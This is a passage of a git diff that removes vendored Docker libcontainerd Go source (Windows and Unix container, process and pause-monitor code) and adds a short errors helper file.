{ - configuration.Credentials = c.Credentials - continue - } - } - - // We must have a layer option with at least one 
path - if layerOpt == nil || layerOpt.LayerPaths == nil { - return fmt.Errorf("no layer option or paths were supplied to the runtime") - } - - if configuration.HvPartition { - // Find the upper-most utility VM image, since the utility VM does not - // use layering in RS1. - // TODO @swernli/jhowardmsft at some point post RS1 this may be re-locatable. - var uvmImagePath string - for _, path := range layerOpt.LayerPaths { - fullPath := filepath.Join(path, "UtilityVM") - _, err := os.Stat(fullPath) - if err == nil { - uvmImagePath = fullPath - break - } - if !os.IsNotExist(err) { - return err - } - } - if uvmImagePath == "" { - return errors.New("utility VM image could not be found") - } - configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath} - } else { - configuration.VolumePath = spec.Root.Path - } - - configuration.LayerFolderPath = layerOpt.LayerFolderPath - - for _, layerPath := range layerOpt.LayerPaths { - _, filename := filepath.Split(layerPath) - g, err := hcsshim.NameToGuid(filename) - if err != nil { - return err - } - configuration.Layers = append(configuration.Layers, hcsshim.Layer{ - ID: g.ToString(), - Path: layerPath, - }) - } - - // Add the mounts (volumes, bind mounts etc) to the structure - mds := make([]hcsshim.MappedDir, len(spec.Mounts)) - for i, mount := range spec.Mounts { - mds[i] = hcsshim.MappedDir{ - HostPath: mount.Source, - ContainerPath: mount.Destination, - ReadOnly: false, - } - for _, o := range mount.Options { - if strings.ToLower(o) == "ro" { - mds[i].ReadOnly = true - } - } - } - configuration.MappedDirectories = mds - - hcsContainer, err := hcsshim.CreateContainer(containerID, configuration) - if err != nil { - return err - } - - // Construct a container object for calling start on it. 
- container := &container{ - containerCommon: containerCommon{ - process: process{ - processCommon: processCommon{ - containerID: containerID, - client: clnt, - friendlyName: InitFriendlyName, - }, - commandLine: strings.Join(spec.Process.Args, " "), - }, - processes: make(map[string]*process), - }, - ociSpec: spec, - hcsContainer: hcsContainer, - } - - container.options = options - for _, option := range options { - if err := option.Apply(container); err != nil { - logrus.Errorf("libcontainerd: %v", err) - } - } - - // Call start, and if it fails, delete the container from our - // internal structure, start will keep HCS in sync by deleting the - // container there. - logrus.Debugf("libcontainerd: Create() id=%s, Calling start()", containerID) - if err := container.start(attachStdio); err != nil { - clnt.deleteContainer(containerID) - return err - } - - logrus.Debugf("libcontainerd: Create() id=%s completed successfully", containerID) - return nil - -} - -// AddProcess is the handler for adding a process to an already running -// container. It's called through docker exec. It returns the system pid of the -// exec'd process. -func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, procToAdd Process, attachStdio StdioCallback) (int, error) { - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return -1, err - } - // Note we always tell HCS to - // create stdout as it's required regardless of '-i' or '-t' options, so that - // docker can always grab the output through logs. We also tell HCS to always - // create stdin, even if it's not used - it will be closed shortly. Stderr - // is only created if it we're not -t. 
- createProcessParms := hcsshim.ProcessConfig{ - EmulateConsole: procToAdd.Terminal, - CreateStdInPipe: true, - CreateStdOutPipe: true, - CreateStdErrPipe: !procToAdd.Terminal, - } - createProcessParms.ConsoleSize[0] = uint(procToAdd.ConsoleSize.Height) - createProcessParms.ConsoleSize[1] = uint(procToAdd.ConsoleSize.Width) - - // Take working directory from the process to add if it is defined, - // otherwise take from the first process. - if procToAdd.Cwd != "" { - createProcessParms.WorkingDirectory = procToAdd.Cwd - } else { - createProcessParms.WorkingDirectory = container.ociSpec.Process.Cwd - } - - // Configure the environment for the process - createProcessParms.Environment = setupEnvironmentVariables(procToAdd.Env) - createProcessParms.CommandLine = strings.Join(procToAdd.Args, " ") - createProcessParms.User = procToAdd.User.Username - - logrus.Debugf("libcontainerd: commandLine: %s", createProcessParms.CommandLine) - - // Start the command running in the container. - var stdout, stderr io.ReadCloser - var stdin io.WriteCloser - newProcess, err := container.hcsContainer.CreateProcess(&createProcessParms) - if err != nil { - logrus.Errorf("libcontainerd: AddProcess(%s) CreateProcess() failed %s", containerID, err) - return -1, err - } - - pid := newProcess.Pid() - - stdin, stdout, stderr, err = newProcess.Stdio() - if err != nil { - logrus.Errorf("libcontainerd: %s getting std pipes failed %s", containerID, err) - return -1, err - } - - iopipe := &IOPipe{Terminal: procToAdd.Terminal} - iopipe.Stdin = createStdInCloser(stdin, newProcess) - - // Convert io.ReadClosers to io.Readers - if stdout != nil { - iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) - } - if stderr != nil { - iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) - } - - proc := &process{ - processCommon: processCommon{ - containerID: containerID, - friendlyName: processFriendlyName, - client: clnt, - systemPid: uint32(pid), - }, - commandLine: 
createProcessParms.CommandLine, - hcsProcess: newProcess, - } - - // Add the process to the container's list of processes - container.processes[processFriendlyName] = proc - - // Tell the engine to attach streams back to the client - if err := attachStdio(*iopipe); err != nil { - return -1, err - } - - // Spin up a go routine waiting for exit to handle cleanup - go container.waitExit(proc, false) - - return pid, nil -} - -// Signal handles `docker stop` on Windows. While Linux has support for -// the full range of signals, signals aren't really implemented on Windows. -// We fake supporting regular stop and -9 to force kill. -func (clnt *client) Signal(containerID string, sig int) error { - var ( - cont *container - err error - ) - - // Get the container as we need it to get the container handle. - clnt.lock(containerID) - defer clnt.unlock(containerID) - if cont, err = clnt.getContainer(containerID); err != nil { - return err - } - - cont.manualStopRequested = true - - logrus.Debugf("libcontainerd: Signal() containerID=%s sig=%d pid=%d", containerID, sig, cont.systemPid) - - if syscall.Signal(sig) == syscall.SIGKILL { - // Terminate the compute system - if err := cont.hcsContainer.Terminate(); err != nil { - if !hcsshim.IsPending(err) { - logrus.Errorf("libcontainerd: failed to terminate %s - %q", containerID, err) - } - } - } else { - // Terminate Process - if err := cont.hcsProcess.Kill(); err != nil && !hcsshim.IsAlreadyStopped(err) { - // ignore errors - logrus.Warnf("libcontainerd: failed to terminate pid %d in %s: %q", cont.systemPid, containerID, err) - } - } - - return nil -} - -// While Linux has support for the full range of signals, signals aren't really implemented on Windows. -// We try to terminate the specified process whatever signal is requested. 
-func (clnt *client) SignalProcess(containerID string, processFriendlyName string, sig int) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - cont, err := clnt.getContainer(containerID) - if err != nil { - return err - } - - for _, p := range cont.processes { - if p.friendlyName == processFriendlyName { - return p.hcsProcess.Kill() - } - } - - return fmt.Errorf("SignalProcess could not find process %s in %s", processFriendlyName, containerID) -} - -// Resize handles a CLI event to resize an interactive docker run or docker exec -// window. -func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { - // Get the libcontainerd container object - clnt.lock(containerID) - defer clnt.unlock(containerID) - cont, err := clnt.getContainer(containerID) - if err != nil { - return err - } - - h, w := uint16(height), uint16(width) - - if processFriendlyName == InitFriendlyName { - logrus.Debugln("libcontainerd: resizing systemPID in", containerID, cont.process.systemPid) - return cont.process.hcsProcess.ResizeConsole(w, h) - } - - for _, p := range cont.processes { - if p.friendlyName == processFriendlyName { - logrus.Debugln("libcontainerd: resizing exec'd process", containerID, p.systemPid) - return p.hcsProcess.ResizeConsole(w, h) - } - } - - return fmt.Errorf("Resize could not find containerID %s to resize", containerID) - -} - -// Pause handles pause requests for containers -func (clnt *client) Pause(containerID string) error { - unlockContainer := true - // Get the libcontainerd container object - clnt.lock(containerID) - defer func() { - if unlockContainer { - clnt.unlock(containerID) - } - }() - container, err := clnt.getContainer(containerID) - if err != nil { - return err - } - - for _, option := range container.options { - if h, ok := option.(*HyperVIsolationOption); ok { - if !h.IsHyperV { - return errors.New("cannot pause Windows Server Containers") - } - break - } - } - - err = container.hcsContainer.Pause() - 
if err != nil { - return err - } - - // Unlock container before calling back into the daemon - unlockContainer = false - clnt.unlock(containerID) - - return clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StatePause, - }}) -} - -// Resume handles resume requests for containers -func (clnt *client) Resume(containerID string) error { - unlockContainer := true - // Get the libcontainerd container object - clnt.lock(containerID) - defer func() { - if unlockContainer { - clnt.unlock(containerID) - } - }() - container, err := clnt.getContainer(containerID) - if err != nil { - return err - } - - // This should never happen, since Windows Server Containers cannot be paused - for _, option := range container.options { - if h, ok := option.(*HyperVIsolationOption); ok { - if !h.IsHyperV { - return errors.New("cannot resume Windows Server Containers") - } - break - } - } - - err = container.hcsContainer.Resume() - if err != nil { - return err - } - - // Unlock container before calling back into the daemon - unlockContainer = false - clnt.unlock(containerID) - - return clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateResume, - }}) -} - -// Stats handles stats requests for containers -func (clnt *client) Stats(containerID string) (*Stats, error) { - // Get the libcontainerd container object - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return nil, err - } - s, err := container.hcsContainer.Statistics() - if err != nil { - return nil, err - } - st := Stats(s) - return &st, nil -} - -// Restore is the handler for restoring a container -func (clnt *client) Restore(containerID string, _ StdioCallback, unusedOnWindows ...CreateOption) error { - // TODO Windows: Implement this. For now, just tell the backend the container exited. 
- logrus.Debugf("libcontainerd: Restore(%s)", containerID) - return clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateExit, - ExitCode: 1 << 31, - }}) -} - -// GetPidsForContainer returns a list of process IDs running in a container. -// Although implemented, this is not used in Windows. -func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { - var pids []int - clnt.lock(containerID) - defer clnt.unlock(containerID) - cont, err := clnt.getContainer(containerID) - if err != nil { - return nil, err - } - - // Add the first process - pids = append(pids, int(cont.containerCommon.systemPid)) - // And add all the exec'd processes - for _, p := range cont.processes { - pids = append(pids, int(p.processCommon.systemPid)) - } - return pids, nil -} - -// Summary returns a summary of the processes running in a container. -// This is present in Windows to support docker top. In linux, the -// engine shells out to ps to get process information. On Windows, as -// the containers could be Hyper-V containers, they would not be -// visible on the container host. However, libcontainerd does have -// that information. -func (clnt *client) Summary(containerID string) ([]Summary, error) { - - // Get the libcontainerd container object - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return nil, err - } - p, err := container.hcsContainer.ProcessList() - if err != nil { - return nil, err - } - pl := make([]Summary, len(p)) - for i := range p { - pl[i] = Summary(p[i]) - } - return pl, nil -} - -// UpdateResources updates resources for a running container. 
-func (clnt *client) UpdateResources(containerID string, resources Resources) error { - // Updating resource isn't supported on Windows - // but we should return nil for enabling updating container - return nil -} - -func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { - return errors.New("Windows: Containers do not support checkpoints") -} - -func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { - return errors.New("Windows: Containers do not support checkpoints") -} - -func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { - return nil, errors.New("Windows: Containers do not support checkpoints") -} - -func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { - return &ServerVersion{}, nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/container.go b/vendor/github.com/docker/docker/libcontainerd/container.go deleted file mode 100644 index b40321389a..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/container.go +++ /dev/null @@ -1,13 +0,0 @@ -package libcontainerd - -const ( - // InitFriendlyName is the name given in the lookup map of processes - // for the first process started in a container. 
- InitFriendlyName = "init" - configFilename = "config.json" -) - -type containerCommon struct { - process - processes map[string]*process -} diff --git a/vendor/github.com/docker/docker/libcontainerd/container_unix.go b/vendor/github.com/docker/docker/libcontainerd/container_unix.go deleted file mode 100644 index 61bab145f2..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/container_unix.go +++ /dev/null @@ -1,250 +0,0 @@ -// +build linux solaris - -package libcontainerd - -import ( - "encoding/json" - "io" - "io/ioutil" - "os" - "path/filepath" - "sync" - "syscall" - "time" - - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/pkg/ioutils" - specs "github.com/opencontainers/runtime-spec/specs-go" - "github.com/tonistiigi/fifo" - "golang.org/x/net/context" -) - -type container struct { - containerCommon - - // Platform specific fields are below here. - pauseMonitor - oom bool - runtime string - runtimeArgs []string -} - -type runtime struct { - path string - args []string -} - -// WithRuntime sets the runtime to be used for the created container -func WithRuntime(path string, args []string) CreateOption { - return runtime{path, args} -} - -func (rt runtime) Apply(p interface{}) error { - if pr, ok := p.(*container); ok { - pr.runtime = rt.path - pr.runtimeArgs = rt.args - } - return nil -} - -func (ctr *container) clean() error { - if os.Getenv("LIBCONTAINERD_NOCLEAN") == "1" { - return nil - } - if _, err := os.Lstat(ctr.dir); err != nil { - if os.IsNotExist(err) { - return nil - } - return err - } - - if err := os.RemoveAll(ctr.dir); err != nil { - return err - } - return nil -} - -// cleanProcess removes the fifos used by an additional process. -// Caller needs to lock container ID before calling this method. 
-func (ctr *container) cleanProcess(id string) { - if p, ok := ctr.processes[id]; ok { - for _, i := range []int{syscall.Stdin, syscall.Stdout, syscall.Stderr} { - if err := os.Remove(p.fifo(i)); err != nil && !os.IsNotExist(err) { - logrus.Warnf("libcontainerd: failed to remove %v for process %v: %v", p.fifo(i), id, err) - } - } - } - delete(ctr.processes, id) -} - -func (ctr *container) spec() (*specs.Spec, error) { - var spec specs.Spec - dt, err := ioutil.ReadFile(filepath.Join(ctr.dir, configFilename)) - if err != nil { - return nil, err - } - if err := json.Unmarshal(dt, &spec); err != nil { - return nil, err - } - return &spec, nil -} - -func (ctr *container) start(checkpoint string, checkpointDir string, attachStdio StdioCallback) (err error) { - spec, err := ctr.spec() - if err != nil { - return nil - } - - ctx, cancel := context.WithCancel(context.Background()) - defer cancel() - ready := make(chan struct{}) - - fifoCtx, cancel := context.WithCancel(context.Background()) - defer func() { - if err != nil { - cancel() - } - }() - - iopipe, err := ctr.openFifos(fifoCtx, spec.Process.Terminal) - if err != nil { - return err - } - - var stdinOnce sync.Once - - // we need to delay stdin closure after container start or else "stdin close" - // event will be rejected by containerd. 
- // stdin closure happens in attachStdio - stdin := iopipe.Stdin - iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { - var err error - stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed - err = stdin.Close() - go func() { - select { - case <-ready: - case <-ctx.Done(): - } - select { - case <-ready: - if err := ctr.sendCloseStdin(); err != nil { - logrus.Warnf("failed to close stdin: %+v", err) - } - default: - } - }() - }) - return err - }) - - r := &containerd.CreateContainerRequest{ - Id: ctr.containerID, - BundlePath: ctr.dir, - Stdin: ctr.fifo(syscall.Stdin), - Stdout: ctr.fifo(syscall.Stdout), - Stderr: ctr.fifo(syscall.Stderr), - Checkpoint: checkpoint, - CheckpointDir: checkpointDir, - // check to see if we are running in ramdisk to disable pivot root - NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "", - Runtime: ctr.runtime, - RuntimeArgs: ctr.runtimeArgs, - } - ctr.client.appendContainer(ctr) - - if err := attachStdio(*iopipe); err != nil { - ctr.closeFifos(iopipe) - return err - } - - resp, err := ctr.client.remote.apiClient.CreateContainer(context.Background(), r) - if err != nil { - ctr.closeFifos(iopipe) - return err - } - ctr.systemPid = systemPid(resp.Container) - close(ready) - - return ctr.client.backend.StateChanged(ctr.containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateStart, - Pid: ctr.systemPid, - }}) -} - -func (ctr *container) newProcess(friendlyName string) *process { - return &process{ - dir: ctr.dir, - processCommon: processCommon{ - containerID: ctr.containerID, - friendlyName: friendlyName, - client: ctr.client, - }, - } -} - -func (ctr *container) handleEvent(e *containerd.Event) error { - ctr.client.lock(ctr.containerID) - defer ctr.client.unlock(ctr.containerID) - switch e.Type { - case StateExit, StatePause, StateResume, StateOOM: - st := StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: e.Type, - ExitCode: e.Status, - }, - OOMKilled: e.Type == 
StateExit && ctr.oom, - } - if e.Type == StateOOM { - ctr.oom = true - } - if e.Type == StateExit && e.Pid != InitFriendlyName { - st.ProcessID = e.Pid - st.State = StateExitProcess - } - - // Remove process from list if we have exited - switch st.State { - case StateExit: - ctr.clean() - ctr.client.deleteContainer(e.Id) - case StateExitProcess: - ctr.cleanProcess(st.ProcessID) - } - ctr.client.q.append(e.Id, func() { - if err := ctr.client.backend.StateChanged(e.Id, st); err != nil { - logrus.Errorf("libcontainerd: backend.StateChanged(): %v", err) - } - if e.Type == StatePause || e.Type == StateResume { - ctr.pauseMonitor.handle(e.Type) - } - if e.Type == StateExit { - if en := ctr.client.getExitNotifier(e.Id); en != nil { - en.close() - } - } - }) - - default: - logrus.Debugf("libcontainerd: event unhandled: %+v", e) - } - return nil -} - -// discardFifos attempts to fully read the container fifos to unblock processes -// that may be blocked on the writer side. -func (ctr *container) discardFifos() { - ctx, _ := context.WithTimeout(context.Background(), 3*time.Second) - for _, i := range []int{syscall.Stdout, syscall.Stderr} { - f, err := fifo.OpenFifo(ctx, ctr.fifo(i), syscall.O_RDONLY|syscall.O_NONBLOCK, 0) - if err != nil { - logrus.Warnf("error opening fifo %v for discarding: %+v", f, err) - continue - } - go func() { - io.Copy(ioutil.Discard, f) - }() - } -} diff --git a/vendor/github.com/docker/docker/libcontainerd/container_windows.go b/vendor/github.com/docker/docker/libcontainerd/container_windows.go deleted file mode 100644 index 9b1965099a..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/container_windows.go +++ /dev/null @@ -1,311 +0,0 @@ -package libcontainerd - -import ( - "fmt" - "io" - "io/ioutil" - "strings" - "syscall" - "time" - - "github.com/Microsoft/hcsshim" - "github.com/Sirupsen/logrus" - "github.com/opencontainers/runtime-spec/specs-go" -) - -type container struct { - containerCommon - - // Platform specific fields are 
below here. There are none presently on Windows. - options []CreateOption - - // The ociSpec is required, as client.Create() needs a spec, - // but can be called from the RestartManager context which does not - // otherwise have access to the Spec - ociSpec specs.Spec - - manualStopRequested bool - hcsContainer hcsshim.Container -} - -func (ctr *container) newProcess(friendlyName string) *process { - return &process{ - processCommon: processCommon{ - containerID: ctr.containerID, - friendlyName: friendlyName, - client: ctr.client, - }, - } -} - -// start starts a created container. -// Caller needs to lock container ID before calling this method. -func (ctr *container) start(attachStdio StdioCallback) error { - var err error - isServicing := false - - for _, option := range ctr.options { - if s, ok := option.(*ServicingOption); ok && s.IsServicing { - isServicing = true - } - } - - // Start the container. If this is a servicing container, this call will block - // until the container is done with the servicing execution. - logrus.Debugln("libcontainerd: starting container ", ctr.containerID) - if err = ctr.hcsContainer.Start(); err != nil { - logrus.Errorf("libcontainerd: failed to start container: %s", err) - if err := ctr.terminate(); err != nil { - logrus.Errorf("libcontainerd: failed to cleanup after a failed Start. %s", err) - } else { - logrus.Debugln("libcontainerd: cleaned up after failed Start by calling Terminate") - } - return err - } - - // Note we always tell HCS to - // create stdout as it's required regardless of '-i' or '-t' options, so that - // docker can always grab the output through logs. We also tell HCS to always - // create stdin, even if it's not used - it will be closed shortly. Stderr - // is only created if it we're not -t. 
- createProcessParms := &hcsshim.ProcessConfig{ - EmulateConsole: ctr.ociSpec.Process.Terminal, - WorkingDirectory: ctr.ociSpec.Process.Cwd, - CreateStdInPipe: !isServicing, - CreateStdOutPipe: !isServicing, - CreateStdErrPipe: !ctr.ociSpec.Process.Terminal && !isServicing, - } - createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height) - createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width) - - // Configure the environment for the process - createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env) - createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ") - createProcessParms.User = ctr.ociSpec.Process.User.Username - - // Start the command running in the container. - newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms) - if err != nil { - logrus.Errorf("libcontainerd: CreateProcess() failed %s", err) - if err := ctr.terminate(); err != nil { - logrus.Errorf("libcontainerd: failed to cleanup after a failed CreateProcess. %s", err) - } else { - logrus.Debugln("libcontainerd: cleaned up after failed CreateProcess by calling Terminate") - } - return err - } - - pid := newProcess.Pid() - - // Save the hcs Process and PID - ctr.process.friendlyName = InitFriendlyName - ctr.process.hcsProcess = newProcess - - // If this is a servicing container, wait on the process synchronously here and - // if it succeeds, wait for it cleanly shutdown and merge into the parent container. 
- if isServicing { - exitCode := ctr.waitProcessExitCode(&ctr.process) - - if exitCode != 0 { - if err := ctr.terminate(); err != nil { - logrus.Warnf("libcontainerd: terminating servicing container %s failed: %s", ctr.containerID, err) - } - return fmt.Errorf("libcontainerd: servicing container %s returned non-zero exit code %d", ctr.containerID, exitCode) - } - - return ctr.hcsContainer.WaitTimeout(time.Minute * 5) - } - - var stdout, stderr io.ReadCloser - var stdin io.WriteCloser - stdin, stdout, stderr, err = newProcess.Stdio() - if err != nil { - logrus.Errorf("libcontainerd: failed to get stdio pipes: %s", err) - if err := ctr.terminate(); err != nil { - logrus.Errorf("libcontainerd: failed to cleanup after a failed Stdio. %s", err) - } - return err - } - - iopipe := &IOPipe{Terminal: ctr.ociSpec.Process.Terminal} - - iopipe.Stdin = createStdInCloser(stdin, newProcess) - - // Convert io.ReadClosers to io.Readers - if stdout != nil { - iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) - } - if stderr != nil { - iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) - } - - // Save the PID - logrus.Debugf("libcontainerd: process started - PID %d", pid) - ctr.systemPid = uint32(pid) - - // Spin up a go routine waiting for exit to handle cleanup - go ctr.waitExit(&ctr.process, true) - - ctr.client.appendContainer(ctr) - - if err := attachStdio(*iopipe); err != nil { - // OK to return the error here, as waitExit will handle tear-down in HCS - return err - } - - // Tell the docker engine that the container has started. - si := StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateStart, - Pid: ctr.systemPid, // Not sure this is needed? Double-check monitor.go in daemon BUGBUG @jhowardmsft - }} - logrus.Debugf("libcontainerd: start() completed OK, %+v", si) - return ctr.client.backend.StateChanged(ctr.containerID, si) - -} - -// waitProcessExitCode will wait for the given process to exit and return its error code. 
-func (ctr *container) waitProcessExitCode(process *process) int { - // Block indefinitely for the process to exit. - err := process.hcsProcess.Wait() - if err != nil { - if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE { - logrus.Warnf("libcontainerd: Wait() failed (container may have been killed): %s", err) - } - // Fall through here, do not return. This ensures we attempt to continue the - // shutdown in HCS and tell the docker engine that the process/container - // has exited to avoid a container being dropped on the floor. - } - - exitCode, err := process.hcsProcess.ExitCode() - if err != nil { - if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE { - logrus.Warnf("libcontainerd: unable to get exit code from container %s", ctr.containerID) - } - // Since we got an error retrieving the exit code, make sure that the code we return - // doesn't incorrectly indicate success. - exitCode = -1 - - // Fall through here, do not return. This ensures we attempt to continue the - // shutdown in HCS and tell the docker engine that the process/container - // has exited to avoid a container being dropped on the floor. - } - - return exitCode -} - -// waitExit runs as a goroutine waiting for the process to exit. It's -// equivalent to (in the linux containerd world) where events come in for -// state change notifications from containerd. 
-func (ctr *container) waitExit(process *process, isFirstProcessToStart bool) error { - logrus.Debugln("libcontainerd: waitExit() on pid", process.systemPid) - - exitCode := ctr.waitProcessExitCode(process) - // Lock the container while shutting down - ctr.client.lock(ctr.containerID) - - // Assume the container has exited - si := StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateExit, - ExitCode: uint32(exitCode), - Pid: process.systemPid, - ProcessID: process.friendlyName, - }, - UpdatePending: false, - } - - // But it could have been an exec'd process which exited - if !isFirstProcessToStart { - si.State = StateExitProcess - ctr.cleanProcess(process.friendlyName) - } else { - updatePending, err := ctr.hcsContainer.HasPendingUpdates() - if err != nil { - logrus.Warnf("libcontainerd: HasPendingUpdates() failed (container may have been killed): %s", err) - } else { - si.UpdatePending = updatePending - } - - logrus.Debugf("libcontainerd: shutting down container %s", ctr.containerID) - if err := ctr.shutdown(); err != nil { - logrus.Debugf("libcontainerd: failed to shutdown container %s", ctr.containerID) - } else { - logrus.Debugf("libcontainerd: completed shutting down container %s", ctr.containerID) - } - if err := ctr.hcsContainer.Close(); err != nil { - logrus.Error(err) - } - - // Remove process from list if we have exited - if si.State == StateExit { - ctr.client.deleteContainer(ctr.containerID) - } - } - - if err := process.hcsProcess.Close(); err != nil { - logrus.Errorf("libcontainerd: hcsProcess.Close(): %v", err) - } - - // Unlock here before we call back into the daemon to update state - ctr.client.unlock(ctr.containerID) - - // Call into the backend to notify it of the state change. 
- logrus.Debugf("libcontainerd: waitExit() calling backend.StateChanged %+v", si) - if err := ctr.client.backend.StateChanged(ctr.containerID, si); err != nil { - logrus.Error(err) - } - - logrus.Debugf("libcontainerd: waitExit() completed OK, %+v", si) - - return nil -} - -// cleanProcess removes process from the map. -// Caller needs to lock container ID before calling this method. -func (ctr *container) cleanProcess(id string) { - delete(ctr.processes, id) -} - -// shutdown shuts down the container in HCS -// Caller needs to lock container ID before calling this method. -func (ctr *container) shutdown() error { - const shutdownTimeout = time.Minute * 5 - err := ctr.hcsContainer.Shutdown() - if hcsshim.IsPending(err) { - // Explicit timeout to avoid a (remote) possibility that shutdown hangs indefinitely. - err = ctr.hcsContainer.WaitTimeout(shutdownTimeout) - } else if hcsshim.IsAlreadyStopped(err) { - err = nil - } - - if err != nil { - logrus.Debugf("libcontainerd: error shutting down container %s %v calling terminate", ctr.containerID, err) - if err := ctr.terminate(); err != nil { - return err - } - return err - } - - return nil -} - -// terminate terminates the container in HCS -// Caller needs to lock container ID before calling this method. 
-func (ctr *container) terminate() error { - const terminateTimeout = time.Minute * 5 - err := ctr.hcsContainer.Terminate() - - if hcsshim.IsPending(err) { - err = ctr.hcsContainer.WaitTimeout(terminateTimeout) - } else if hcsshim.IsAlreadyStopped(err) { - err = nil - } - - if err != nil { - logrus.Debugf("libcontainerd: error terminating container %s %v", ctr.containerID, err) - return err - } - - return nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/errors.go b/vendor/github.com/docker/docker/libcontainerd/errors.go new file mode 100644 index 0000000000..bdc26715bc --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/errors.go @@ -0,0 +1,13 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "errors" + + "github.com/docker/docker/errdefs" +) + +func newNotFoundError(err string) error { return errdefs.NotFound(errors.New(err)) } + +func newInvalidParameterError(err string) error { return errdefs.InvalidParameter(errors.New(err)) } + +func newConflictError(err string) error { return errdefs.Conflict(errors.New(err)) } diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go deleted file mode 100644 index e126b7a550..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go +++ /dev/null @@ -1,31 +0,0 @@ -package libcontainerd - -import ( - "fmt" - "os" - "strconv" - - "github.com/Sirupsen/logrus" - "github.com/opencontainers/runc/libcontainer/system" -) - -func setOOMScore(pid, score int) error { - oomScoreAdjPath := fmt.Sprintf("/proc/%d/oom_score_adj", pid) - f, err := os.OpenFile(oomScoreAdjPath, os.O_WRONLY, 0) - if err != nil { - return err - } - stringScore := strconv.Itoa(score) - _, err = f.WriteString(stringScore) - f.Close() - if os.IsPermission(err) { - // Setting oom_score_adj does not work in an - // unprivileged container. 
Ignore the error, but log - // it if we appear not to be in that situation. - if !system.RunningInUserNS() { - logrus.Debugf("Permission denied writing %q to %s", stringScore, oomScoreAdjPath) - } - return nil - } - return err -} diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go deleted file mode 100644 index 2ebe5e87cf..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go +++ /dev/null @@ -1,5 +0,0 @@ -package libcontainerd - -func setOOMScore(pid, score int) error { - return nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go deleted file mode 100644 index 4f3766d95c..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go +++ /dev/null @@ -1,42 +0,0 @@ -// +build !windows - -package libcontainerd - -import ( - "sync" -) - -// pauseMonitor is helper to get notifications from pause state changes. 
-type pauseMonitor struct { - sync.Mutex - waiters map[string][]chan struct{} -} - -func (m *pauseMonitor) handle(t string) { - m.Lock() - defer m.Unlock() - if m.waiters == nil { - return - } - q, ok := m.waiters[t] - if !ok { - return - } - if len(q) > 0 { - close(q[0]) - m.waiters[t] = q[1:] - } -} - -func (m *pauseMonitor) append(t string, waiter chan struct{}) { - m.Lock() - defer m.Unlock() - if m.waiters == nil { - m.waiters = make(map[string][]chan struct{}) - } - _, ok := m.waiters[t] - if !ok { - m.waiters[t] = make([]chan struct{}, 0) - } - m.waiters[t] = append(m.waiters[t], waiter) -} diff --git a/vendor/github.com/docker/docker/libcontainerd/process.go b/vendor/github.com/docker/docker/libcontainerd/process.go deleted file mode 100644 index 57562c8789..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/process.go +++ /dev/null @@ -1,18 +0,0 @@ -package libcontainerd - -// processCommon are the platform common fields as part of the process structure -// which keeps the state for the main container process, as well as any exec -// processes. 
